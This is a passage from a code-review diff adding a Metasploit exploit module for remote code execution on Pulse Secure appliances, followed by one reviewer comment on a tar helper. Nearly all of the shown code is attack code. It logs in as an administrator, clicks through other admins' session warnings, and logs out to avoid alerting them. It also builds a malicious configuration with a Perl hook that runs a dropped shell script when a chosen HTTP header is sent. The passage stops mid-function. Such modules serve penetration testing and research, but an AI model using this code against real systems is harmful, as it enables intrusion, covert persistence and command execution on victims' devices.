modules/exploits/linux/http/pulse_secure_gzip_rce.rb

```diff
@@ -0,0 +1,276 @@
+      'method' => 'POST',
+      'headers' => { 'Referer' => "#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system" },
+      'data' => post_data.to_s,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
+    })
+  end
+
+  def login
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),
+      'method' => 'POST',
+      'vars_post' => {
+        'tz_offset' => '-300',
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'realm' => 'Admin Users',
+        'btnSubmit' => 'Sign In'
+      },
+      'keep_cookies' => true
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302
+    location = res.headers['Location']
+    fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed')
+
+    return unless location.include?('admin%2Dconfirm')
+
+    # if the account we login with is already logged in, or another admin is logged in, a warning is displayed.  Click through it.
+    print_status('Other admin sessions detected, continuing')
+    res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true })
+    fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200
+    fds = res.body.scan(/name="FormDataStr" value="([^"]+)">/).last
+    xsauth = res_get_xsauth(res)
+    fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),
+      'method' => 'POST',
+      'vars_post' => {
+        'btnContinue' => 'Continue the session',
+        'FormDataStr' => fds.first,
+        'xsauth' => xsauth
+      },
+      'keep_cookies' => true
+    })
+    fail_with(Failure::UnexpectedReply, 'Login failed') unless res
+  end
+
+  def logout
+    print_status('Logging out to prevent warnings to other admins')
+    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') })
+    fail_with(Failure::UnexpectedReply, 'Logout failed1') unless res&.code == 200
+
+    logout_uri = res.body.scan(%r{/dana-na/auth/logout\.cgi\?xsauth=\w+}).first
+    fail_with(Failure::UnexpectedReply, 'Logout failed2') if logout_uri.nil?
+
+    res = send_request_cgi({ 'uri' => logout_uri })
+    fail_with(Failure::UnexpectedReply, 'Logout failed3') unless res&.code == 302
+  end
+
+  def build_malicious_config(cmd, trigger)
+    payload_script = "#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh"
+    perl = <<~PERL
+      if (length $ENV{HTTP_#{trigger}}){
+        chmod 0775, "/data/var/runtime/tmp/tt/#{payload_script}";
+        system("env /data/var/runtime/tmp/tt/#{payload_script}");
+      }
+    PERL
+    tarfile = StringIO.new
+    Gem::Package::TarWriter.new(tarfile) do |tar|
```

Comment:
Hmm, we should fill out [lib/rex/tar.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/tar.rb) eventually! It's just a wrapper still, lol.